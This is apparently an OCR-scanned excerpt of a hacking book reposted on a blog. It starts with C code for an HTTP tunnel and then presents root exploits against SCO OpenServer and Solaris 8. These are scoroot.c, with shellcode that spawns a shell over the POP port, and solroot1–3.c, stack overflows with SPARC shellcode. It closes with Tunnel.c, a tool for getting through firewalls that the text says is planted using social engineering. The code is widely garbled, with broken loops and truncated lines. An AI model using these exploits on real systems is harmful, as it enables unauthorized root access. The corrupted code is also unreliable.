http_method (int fd, Http_destination *dest, Http_method method, ssize_t length)
{
char str[1024]; /* FIXME: possible buffer overflow */ Http_request *request; ssize_t n; if (fd == -1) {
log_error ("http_method: fd == -1"); return -1;
}
if (dest->proxy_name == NULL)
sprintf (str, "/index.html"); else
sprintf (str, "http://%s:%d/index.html", dest->host_name, dest->host_port);
request = http_create_request (method, str, 1, 1); if (request == NULL) return -1;
sprintf (str, "%s:%d", dest->host_name, dest->host_port); http_add_header (&request->header, "Host", str);
if (length >= 0)
{
sprintf (str, "%d", length);
http_add_header (&request->header, "Content-Length", str);
}
http_add_header (&request->header, "Connection", "close"); if (dest->proxy_authorization) {
http_add_header (&request->header, "Proxy-Authorization", dest->proxy_authorization);
}
if (dest->user_agent) {
http_add_header (&request->header, "User-Agent", dest->user_agent);
}
n = http_write_request (fd, request); http_destroy_request (request); return n;
}
ssize_t
http_get (int fd, Http_destination *dest)
return http_method (fd, dest, HTTP_GET, -1);
}
ssize_t
http_put (int fd, Http_destination *dest, size_t length)
{
return http_method (fd, dest, HTTP_PUT, (ssize_t)length);
}
ssize_t
http_post (int fd, Http_destination *dest, size_t length)
{
return http_method (fd, dest, HTTP_POST, (ssize_t)length);
}
int
http_error_to_errno (int err)
{
/* Error codes taken from RFC2068. */ switch (err) {
case -1: /* system error */
return errno; case -200: /* OK */ case -201: /* Created */ case -202: /* Accepted */
case -203: /* Non-Authoritative Information */ case -204: /* No Content */ case -205: /* Reset Content */ case -206: /* Partial Content */ return 0;
case -400: /* Bad Request */
log_error ("http_error_to_errno: 400 bad request"); return EIO; case -401: /* Unauthorized */
log_error ("http_error_to_errno: 401 unauthorized");
return EACCES;
case -403: /* Forbidden */
log_error ("http_error_to_errno: 403 forbidden");
return EACCES;
case -404: /* Not Found */
log_error ("http_error_to_errno: 404 not found"); return ENOENT; case -411: /* Length Required */
log_error ("http_error_to_errno: 411 length required"); return EIO; case -413: /* Request Entity Too Large */
log_error ("http_error_to_errno: 413 request entity too large
");
return EIO;
case -505: /* HTTP Version Not Supported */
log_error ("http_error_to_errno: 413 HTTP version not support
return EIO; case -100: /* Continue */
case
-101
/*
Switching Protocols */
case
-300
/*
Multiple Choices */
case
-301
/*
Moved Permanently */
case
-302
/*
Moved Temporarily */
case
-303
/*
See Other */
case
-304
/*
Not Modified */
case
-305
/*
Use Proxy */
case
-402
/*
Payment Required */
case
-405
/*
Method Not Allowed */
case
-406
/*
Not Acceptable */
case
-407
/*
Proxy Autentication Required */
case
-408
/*
Request Timeout */
case
-409
/*
Conflict */
case
-410
/*
Gone */
case
-412: /*
Precondition Failed */
case
-414
/*
Request-URI Too Long */
case
-415
/*
Unsupported Media Type */
case
-500
/*
Internal Server Error */
case
-501
/*
Not Implemented */
case
-502
/*
Bad Gateway */
case
-503
/*
Service Unavailable */
case
-504
/*
Gateway Timeout */
log_error ("http_error_to_errno: HTTP error %d", err); return EIO; default:
log_error ("http_error_to_errno: unknown error %d", err); return EIO;
}
}
static Http_method
http_string_to_method (const char *method, size_t n)
{
if (strncmp (method, "GET", n) == 0)
return HTTP_GET; if (strncmp (method, "PUT", n) == 0)
return HTTP_PUT; if (strncmp (method, "POST", n) == 0)
return HTTP_POST; if (strncmp (method, "OPTIONS", n) == 0)
return HTTP_OPTIONS;
if (strncmp (method, "HEAD", n) == 0) return HTTP_HEAD;
if (strncmp (method, "DELETE", n) == 0)
return HTTP_DELETE; if (strncmp (method, "TRACE", n) == 0)
return HTTP_TRACE;
return -1;
}
static const char *
http_method_to_string (Http_method method)
switch (method) {
case HTTP_GET: return "GET";
case HTTP_PUT: return "PUT"; case HTTP_POST: return "POST"; case HTTP_OPTIONS: return "OPTIONS"; case HTTP_HEAD: return "HEAD"; case HTTP_DELETE: return "DELETE"; case HTTP_TRACE: return "TRACE";
}
return "(uknown)";
}
static ssize_t
read_until (int fd, int ch, unsigned char **data)
{
unsigned char *buf, *buf2;
ssize_t n, len, buf_size;
*data = NULL;
buf_size = 100;
buf = malloc (buf_size);
if (buf == NULL)
{
log_error ("read_until: out of memory"); return -1;
}
len = 0;
while ((n = read_all (fd, buf + len, 1)) == 1)
{
if (buf[len++] == ch) break;
if (len + 1 == buf_size)
{
buf_size *= 2;
buf2 = realloc (buf, buf_size);
if (buf2 == NULL)
{
log_error ("read_until: realloc failed"); free (buf); return -1;
}
buf = buf2;
}
}
if (n <= 0)
{
free (buf);
if (n == 0)
log_error ("read_until: closed"); else
log_error ("read_until: read error: %s", strerror (errno)); return n;
}
/* Shrink to minimum size + 1 in case someone wants to add a NUL.
/
buf2 = realloc (buf, len + 1);
if (buf2 == NULL)
log_error ("read_until: realloc: shrink failed"); /* not fatal
*/
else
buf = buf2;
*data = buf; return len;
}
static inline Http_header *
http_alloc_header (const char *name, const char *value)
{
Http_header *header;
header = malloc (sizeof (Http_header));
if (header == NULL)
return NULL; header->name = header->value = NULL; header->name = strdup (name); header->value = strdup (value); if (name == NULL || value == NULL)
{
if (name == NULL)
free ((char *)name);
if (value == NULL)
free ((char *)value); free (header); return NULL;
}
return header;
}
Http_header *
http_add_header (Http_header **header, const char *name, const char *value)
{
Http_header *new_header;
new_header = http_alloc_header (name, value); if (new_header == NULL)
return NULL; new_header->next = NULL; while (*header)
header = &(*header)->next; *header = new_header; return new_header;
}
static ssize_t
parse_header (int fd, Http_header **header)
{
unsigned char buf[2]; unsigned char *data; Http_header *h; size_t len; ssize_t n;
*header = NULL;
n = read_all (fd, buf, 2); if (n <= 0) return n;
if (buf[0] == '\r' && buf[1] == '\n')
return n; h = malloc (sizeof (Http_header)); if (h == NULL) ~~
{
log_error ("parse_header: malloc failed"); return -1;
}
*header = h; h->name = NULL; h->value = NULL;
n = read_until (fd, &data);
if (n <= 0)
return n; data = realloc (data, n + 2);
if (data == NULL)
{
log_error ("parse_header: realloc failed");
return -1;
}
memmove (data + 2, data, n); memcpy (data, buf, 2);
n += 2;
data[n - 1] = 0;
h->name = data; len = n;
n = read_until (fd, '\r', &data);
if (n <= 0)
return n;
data[n - 1] = 0;
h->value = data; len += n;
n = read_until (fd, '\n', &data);
if (n <= 0)
return n; free (data);
if (n != 1)
{
log_error ("parse_header: invalid line ending"); return -1;
}
len += n;
log_verbose ("parse_header: %s:%s", h->name, h->value); n = parse_header (fd, &h->next);
if (n <= 0)
return n; len += n; return len;
static ssize_t
http_write_header (int fd, Http_header *header)
{
ssize_t n = 0, m;
if (header == NULL)
return write_all (fd, "\r\n", 2); m = write_all (fd, (void *)header->name, strlen (header->name));
if (m == -1)
{
return -1;
}
n += m;
m = write_all (fd, ": ", 2);
if (m == -1)
{
return -1;
}
n += m;
m = write_all (fd, (void *)header->value, strlen (header->value));
if (m == -1)
{
return -1;
}
n += m;
m = write_all (fd, "\r\n", 2);
if (m == -1)
{
return -1;
}
n += m;
m = http_write_header (fd, header->next);
if (m == -1)
{
return -1;
}
n += m; return n;
}
static void
http_destroy_header (Http_header *header)
{
if (header == NULL)
return;
http_destroy_header (header->next); if (header->name)
free ((char *)header->name); if (header->value)
free ((char *)header->value); free (header);
}
static inline Http_response *
http_allocate_response (const char *status_message)
Http_response *response;
response = malloc (sizeof (Http_response)); if (response == NULL) return NULL;
response->status_message = strdup (status_message); if (response->status_message == NULL)
{
free (response); return NULL;
}
return response;
}
Http_response *
http_create_response (int major_version,
int minor_version,
int status_code,
const char *status_message)
{
Http_response *response;
response = http_allocate_response (status_message); if (response == NULL)
return NULL; response->major_version = major_version; response->minor_version = minor_version; response->status_code = status_code; response->header = NULL; return response;
}
ssize_t
http_parse_response (int fd, Http_response **response_)
{
Http_response *response; unsigned char *data; size_t len; ssize_t n; *response_ = NULL;
response = malloc (sizeof (Http_response)); if (response == NULL)
{
log_error ("http_parse_response: out of memory"); return -1;
}
response->major_version = -1; response->minor_version = -1; response->status_code = -1; response->status_message = NULL; response->header = NULL; n = read_until (fd, &data);
if (n <= 0)
free (response); return n;
else if (n != 5 || memcmp (data, "HTTP", 4) != 0) {
log_error ("http_parse_response: expected \"HTTP\""); free (data); free (response); return -1;
}
free (data); len = n;
n = read_until (fd, &data); if (n <= 0) {
free (response); return n;
}
data[n - 1] = 0;
response->major_version = atoi (data);
log_verbose ("http_parse_response: major version = %d",
response->major_version); free (data); len += n;
n = read_until (fd, ' ', &data);
if (n <= 0)
{
free (response); return n;
}
data[n - 1] = 0;
response->minor_version = atoi (data);
log_verbose ("http_parse_response: minor version = %d",
response->minor_version); free (data); len += n;
n = read_until (fd, ' ', &data);
if (n <= 0)
{
free (response); return n;
}
data[n - 1] = 0;
response->status_code = atoi (data);
log_verbose ("http_parse_response: status code = %d",
response->status_code); free (data); len += n;
n = read_until (fd, '\r', &data);
if (n <= 0)
{
free (response); return n;
}
data[n - 1] = 0;
response->status_message = data;
log_verbose ("http_parse_response: status message = \"%s\"",
response->status_message); len += n;
n = read_until (fd, '\n', &data);
if (n <= 0)
{
http_destroy_response (response); return n;
}
free (data); if (n != 1) {
log_error ("http_parse_request: invalid line ending"); http_destroy_response (response); return -1;
}
len += n;
n = parse_header (fd, &response->header);
if (n <= 0)
{
http_destroy_response (response); return n;
}
len += n;
*response_ = response; return len;
}
void
http_destroy_response (Http_response *response)
{
if (response->status_message)
free ((char *)response->status_message); http_destroy_header (response->header); free (response);
}
static inline Http_request * http_allocate_request (const char *uri)
{
Http_request *request;
request = malloc (sizeof (Http_request)); if (request == NULL)
return NULL; request->uri = strdup (uri); if (request->uri == NULL)
{
free (request); return NULL;
}
return request;
}
Http_request *
http_create_request (Http_method method, const char *uri, int major_version, int minor_version)
{
Http_request *request;
request = http_allocate_request (uri);
if (request == NULL)
return NULL; request->method = method; request->major_version = major_vers ion; request->minor_version = minor_version; request->header = NULL; return request;
}
ssize_t
http_parse_request (int fd, Http_request **request_)
{
Http_request *request; unsigned char *data; size_t len; ssize_t n; *request_ = NULL;
request = malloc (sizeof (Http_request)); if (request == NULL)
{
log_error ("http_parse_request: out of memory"); return -1;
}
request->method = -1; request->uri = NULL; request->major_version = -1; request->minor_version = -1; request->header = NULL; n = read_until (fd, ' ', &data);
if (n <= 0)
{
free (request); return n;
}
request->method = http_string_to_method (data, n - 1); if (request->method == -1) {
log_error ("http_parse_request: expected an HTTP method"); free (data); free (request); return -1;
}
data[n - 1] = 0;
log_verbose ("http_parse_request: method = \"%s\"", data); free (data); len = n;
n = read until (fd, ' ', &data);
if (n <= 0) {
free (request);
return n;
}
data[n - 1] = 0; request->uri = data; len += n;
log_verbose ("http_parse_request: uri = \"%s\"", request->uri); n = read_until (fd, '/', &data);
if (n <= 0)
{
http_destroy_request (request); return n;
}
else if (n != 5 || memcmp (data, "HTTP", 4) != 0)
{
log_error ("http_parse_request: expected \"HTTP\""); free (data);
http_destroy_request (request); return -1;
}
free (data); len = n;
n = read_until (fd, &data);
if (n <= 0)
{
http_destroy_request (request); return n;
}
data[n - 1] = 0;
request->major_version = atoi (data);
log_verbose ("http_parse_request: major version = %d",
request->major_version); free (data); len += n;
n = read_until (fd, '\r', &data);
if (n <= 0)
{
http_destroy_request (request); return n;
}
data[n - 1] = 0;
request->minor_version = atoi (data);
log_verbose ("http_parse_request: minor version = %d",
request->minor_version); free (data); len += n;
n = read_until (fd, '\n', &data);
if (n <= 0)
http_destroy_request (request);
free (data); if (n != 1) {
log_error ("http_parse_request: invalid line ending"); http_destroy_request (request); return -1;
}
len += n;
n = parse_header (fd, &request->header); if (n <= 0) {
http_destroy_request (request); return n;
}
len += n;
*request_ = request; return len;
}
ssize_t
http_write_request (int fd, Http_request *request)
{
char str[1024]; /* FIXME: buffer overflow */ ssize_t n = 0; size_t m;
m = sprintf (str, "%s %s HTTP/%d.%d\r\n",
http_method_to_string (request->method),
request->uri,
request->major_version,
request->minor_version); m = write_all (fd, str, m);
log_verbose ("http_write_request: %s", str);
if (m == -1)
{
log_error ("http_write_request: write error: %s", strerror (errno));
return -1;
}
n += m;
m = http_write_header (fd, request->header);
if (m == -1)
{
return -1;
}
n += m; return n;
}
void
http_destroy_request (Http_request *request)
if (request->uri)
free ((char *)request->uri); http_destroy_header (request->header); free (request);
static Http_header *
http_header_find (Http_header *header, const char *name)
{
if (header == NULL)
return NULL; if (strcmp (header->name, name) == 0)
return header; return http_header_find (header->next, name);
}
const char *
http_header_get (Http_header *header, const char *name)
{
Http_header *h;
h = http_header_find (header, name);
if (h == NULL)
return NULL; return h->value;
}
#if 0 void
http_header_set (Http_header **header, const char *name, const char *value)
{
Http_header *h; size_t n; char *v;
n = strlen (value); v = malloc (n + 1);
if (v == NULL) fail;
memcpy (v, value, n + 1);
h = http_header_find (*header, name);
if (h == NULL)
{
Http_header *h2;
h2 = malloc (sizeof (Http_header));
if (h2 == NULL) fail;
n = strlen (name);
h2->name = malloc (strlen (name) + 1);
if (h2 ->name == NULL) fail;
memcpy (h2->name, name, n + 1); h2->value = v; h2->next = *header; *header = h2;
}
else
free (h->value); h->value = v;
#endif
SCO
As a leading vendor of UNIX, SCO OpenServer has been an effective O/S platform for small and medium-sized businesses worldwide. Newly integrated modifications for email and Internet services allow the SCO user family to retain its standing in this technological evolution. With exceptional graphical user interfaces (shown in Figure 10.20) and user-friendly configuration modules, SCO presents a powerful solution for mission-critical business applications and development.
POP Root Accessibility
Synopsis: POP remote root security breach for SCOPOP server. Hack State: Unauthorized access. Vulnerabilities: SCO OpenServer 5x. Breach: scoroot.c. scoroot.c
#include
#include #include #include #include #include #include #include
char *shell=
"\xeb\x32\x5e\x31\xdb\x8 9\x5e\x0 7\x8 9\x5e\x12\x8 9\x5e\x17" "\x8 8\x5e\x1c\x8d\x16\x8 9\x5 6\x0e\x31\xc0\xb0\x3b\x8d\x7e" "\x12\x8 9\xf9\x8 9\xf9\xbf\x10\x10\x10\x10\x2 9\x7e\xf5\x8 9" "\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff" "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb" "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define ADDR 0x80474b4 #define OFFSET 0 #define BUFLEN 1200
char buf[BUFLEN]; int offset=OFFSET;
int nbytes; int sock; struct sockaddr_in sa; struct hostent *hp; short a;
void main (int argc, char *argv[]) { int i;
if(argc<2) {
printf("Usage: %s
0]);
printf("Default offset is 0. It works against SCOPO
P
v2.1.4-R3\n");
exit(0);
}
if(argc>2)
offset=atoi(argv[2]);
memset(buf,0x90,BUFLEN);
memcpy(buf+800,shell,strlen(shell));
for(i=901;i<0) {
perror("socket()");
exit(0);
}
sa.sin_family=AF_INET;
sa.sin_port=htons(110);
memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) { perror("connect()");
exit(0);
}
printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); fflush(stdout);
write(sock,buf,strlen(buf)); while(1) {
fd_set input;
FD_SET(0,&input); FD_SET(sock,&input);
if((select(sock+1,&input,NULL,NULL,NULL))<0) { if(errno==EINTR) continue; printf("CONNECTION CLOSED... \n");
fflush(stdout);
exit(1);
}
if(FD_ISSET(sock,&input)) {
nbytes=read(sock,buf,BUFLEN); for(i=0;i
if ((a!=10)&&((a >126) || (a<32)) ){ buf[i]='
}
}
write(1,buf,nbytes);
}
if(FD_ISSET(0,&input))
write(sock,buf,read(0,buf,BUFLEN));
}
}
Figure 10.21 Customizing partitions with Solaris.
Solaris
Sun Microsystems' Solaris (www.sun.com/solaris) version 8 UNIX O/S is the industry's first and most popular dot-com-grade operating environment for Intel and Sparc systems. Since its release, Sun has received positive reviews in such publications as PC Magazine and InfoWorld. There are eight features that, industrywide, can be used to evaluate Solaris 8: advanced security, availability, scalability, interoperability, ease of use, multiplatform connectivity, comprehensive open-source developing, and last but certainly not least, it's available free of charge, by downloading www.sun.com/software/solaris /source. Solaris 8 also can preserve existing operating systems and data (see Figure 10.21).
Liabilities
Root Accessibility
Synopsis: Various remote root security breaches. Hack State: Unauthorized access. Vulnerabilities: Solaris 8. Breach: solrootl.c. solroot1.c
#include
#include
#define BUFLEN 500 #define NOP 0x90
char shell[] =
char buf[BUFLEN];
unsigned long int nop, esp; long int offset = 0; unsigned long int get_esp()
{
__asm__("movl %esp,%eax");
}
void
main (int argc, char *argv[])
{
int i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
if (argc > 2)
nop = strtoul(argv[2], NULL, 0);
else
nop = 285; esp = get_esp();
memset(buf, NOP, BUFLEN);
memcpy(buf+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < BUFLEN-4; i += 4)
*((int *) &buf[i]) = esp+offset; printf("jumping to 0x%08x (0x%08x offset %d) [nop %d]\n",
esp+offset, esp, offset, nop); execl("/usr/openwin/bin/kcms_configure", "kcms_configure", "P",
buf,
"foofoo", NULL);
printf("exec failed!\n"); return;
}
solroot2.c
#include
#define EXTRA 400
#define STACK_OFFSET 7 04
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68
"
"\x90 \x0b\x80\x0e\x92\x03 \xa0\x0c\x94\x1a\x80 \x0a\x9c\x03\xa0\x14
"
"\xec\x3b\xbf\xec\xc0\x23 \xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc
"
"\x82 \x10\x20\x3b\x91\xd0 \x20\x08\x90\x1b\xc0 \x0f\x82\x10\x20\x01
"
"\x91 \xd0\x20\x08";
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr; u_long *long_p; u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf ;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long); *long_p++ =targ_addr
f
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0); perror("execl failed");
}
solroot3.c#include
#define BUF_LENGTH 264
#define EXTRA 36
#define STACK_OFFSET -56
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] = ~"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x6 8
"
"\x90 \x0b\x80\x0e\x92\x03 \xa0\x0c\x94\x1a\x80 \x0a\x9c\x03\xa0\x14
"
"\xec\x3b\xbf\xec\xc0\x23 \xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc
"
"\x82 \x10\x20\x3b\x91\xd0 \x20\x08\x90\x1b\xc0 \x0f\x82\x10\x20\x01
"
"\x91 \xd0\x20\x08";
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr; u_long *long_p; u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf ;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long); *long_p++ =targ_addr
f
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\ n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
Conclusion
In this chapter, we discussed scores of secret penetration hack attacks on various well-known operating systems. We learned that hackers can potentially gain control of a target system, or wreak havoc with tactics such as crashing hard drives, burning monitors, deleting files, and congesting system processors. Unfortunately, hacks attacks don't stop at system operating daemons—follow me to the next chapter where we'll discuss Underground penetrations
Proxies and Firewalls
This chapter explores common Underground vulnerability secrets for perimeter protection mechanisms, specifically proxies and firewalls. To review, a proxy is a computer program that acts as a liaison between a user's Web browser and a Web server on the Internet. With this software installed on a server, the proxy is considered a ''gateway," separating the user's internal network from the outside; primarily, it controls the application layer as a type of "firewall," which filters all incoming packets, and protects the network from unauthorized access. Accordingly, dependable firewall software controls access to a network with an imposed security policy, by means of stateful inspection filters, alternately blocking and permitting traffic to internal network data.
Internetworking Gateways
To demonstrate the information contained in this chapter, we'll discuss breaches as they pertain to these specific products: BorderWare, Firewall-1, Gauntlet, NetScreen, PIX, Raptor, and WinGate.
BorderWare
Running on standard Intel platforms, BorderWare (www.borderware.com) uses three perimeter defense software modules for comprehensive network protection. These modules provide packet filtering and circuit-level and application-level gateway monitoring. Other features of the BorderWare firewall include server-to-server and client-to-server VPN access, URL and Web site filtering, and extranet and e-commerce application security. The BorderWare Firewall Console, although somewhat tedious, provides convenient menu-driven administration access to the BorderWare modules. The default firewall configuration prohibits all direct connections from the outside interface to the protected network. As a result, a remote-access component must be configured independently. BorderWare does not come with a command-line administration interface.
Liabilities
Tunneling
Synopsis: Using stealth scanning and/or distorted handshake techniques, a remote attacker can detect ACK tunnel daemon software.
Hack State: Unauthorized remote control of target systems. Vulnerabilities: All versions, depending on the configuration.
Breach: As explained in previous chapters, TCP establishes virtual connections on top of IP. A session is established when a sender forwards a SYN and the receiver responds with a SYN/ACK. Common packet-filtering firewalls assume that a session always starts with a SYN segment. Therefore, they apply their policies on all SYN segments. Normally, manufacturers develop firewalls to apply these rules to SYNs, rather than to ACKs, because a standard session can contain thousands or millions of ACK segments, while containing only one SYN. This reduces the overall firewall workload and helps to reduce the costs of colossal server requirements. In scenarios such as this,
611
tunneling is the breach of choice for remote attacks. With some social engineering and email spam, a hacker installs a customized tunnel, such as Tunnel.c, based on the target firewall configuration detected.
Tunnel.c
#define UDP #undef TCP
#define BUFSIZE 4096
void selectloop(int netfd, int tapfd); void usage(void);
char buffer[BUFSIZE];
main(int ac, char *av[]) { int destport;
struct sockaddr_in destaddr; struct hostent *ht;
int sock; int daemon; int netfd; int tapfd;
if(ac != 3)
usage();
if((destport = atoi(av[2])) == 0)
usage(); if(av[1][0] == '-')
daemon = 1; else
daemon = 0; if(!daemon) {
if((ht = gethostbyname(av[1])) == NULL) {
switch(h_errno) {
case HOST_NOT_FOUND:
printf("%s: Unknown host\n", av[2]); break;
case NO_ADDRESS:
printf("%s: No IP address for hostname\n", av[2]); break; case NO_RECOVERY:
printf("%s: DNS Error\n", av[2]); break;
case TRY_AGAIN:
printf("%s: Try again (DNS Fuckup)\n", av[2]);
break; default:
printf("%s: Unknown DNS error\n", av[2]);
}
exit(0);
}
destaddr.sin_port = htons(destport); destaddr.sin_family = AF_INET;
memcpy(&destaddr.sin_addr, ht->h_addr, ht->h_length);
}
#ifdef TCP
sock = socket(AF_INET, SOCK_STREAM, 0);
#endif #ifdef UDP
sock = socket(AF_INET, SOCK_DGRAM, 0);
#endif
if(sock == -1) {
perror("socket");
exit(0);
}
printf("Opening network socket.\n"); if(!daemon) {
if(connect(sock, &destaddr, sizeof(struct sockaddr_in)) ==
-1) {
perror("connect");
exit(0);
}
netfd = sock;
}
else {
struct sockaddr_in listenaddr;
#ifdef UDP
struct sockaddr_in remote;
#endif
int socklen;
listenaddr.sin_port = htons(destport); listenaddr.sin_family = AF_INET;
listenaddr.sin_addr.s_addr = inet_addr("0.0.0.0"); if(bind(sock, &listenaddr, sizeof(struct sockaddr_in)) ==
-1) {
perror("bind");
exit(0);
}
socklen = sizeof(struct sockaddr_in);
#ifdef TCP
if(listen(sock, 1) == -1) { perror("listen");
exit(0);
}
printf("Waiting for TCP connection... \n");
if((netfd = accept(sock, &listenaddr, &socklen)) == -1) { perror("accept"); exit(0);
}
#else /* TCP */
netfd = sock;
recvfrom(netfd, buffer, BUFSIZE, MSG_PEEK, &remote,
&socklen); connect(netfd, &remote, socklen);
#endif }
printf("Opening /dev/tap0\n"); tapfd = open("/dev/tap0", O_RDWR);
if(tapfd == -1) {
perror("tapfd");
exit(0);
selectloop(netfd, tapfd); return 0;
}
void selectloop(int netfd, int tapfd) { fd_set rfds; int maxfd; int len;
if(netfd > tapfd)
maxfd = netfd; else
maxfd = tapfd;
while(1) {
FD_ZERO(&rfds); FD_SET(netfd, &rfds); FD_SET(tapfd, &rfds);
if(select(maxfd+1, &rfds, NULL, NULL, NULL) == -1) {
perror("select");
exit(0);
}
if(FD_ISSET(netfd, &rfds)) { FD_CLR(netfd, &rfds);
if((len = read(netfd, buffer, BUFSIZE)) < 1) { if(len == -1)
perror("read_netfd"); printf("netfd died, quitting\n"); close(tapfd);
exit(0);
}
printf("%d bytes from network\n", len);
write(tapfd, buffer, len);
continue;
}
if(FD_ISSET(tapfd, &rfds)) { FD_CLR(tapfd, &rfds);
if((len = read(tapfd, buffer, BUFSIZE)) < 1) { if(len == -1)
perror("read_tapfd"); printf("tapfd died, quitting\n"); shutdown(netfd, 2); close(netfd);
exit(0);
}
printf("%d bytes from interface\n", len);
write(netfd, buffer, len);
continue;
}
} /* end of looping */
Hackers The programs in this chapter can be found on the CD bundled with this book.
No comments:
Post a Comment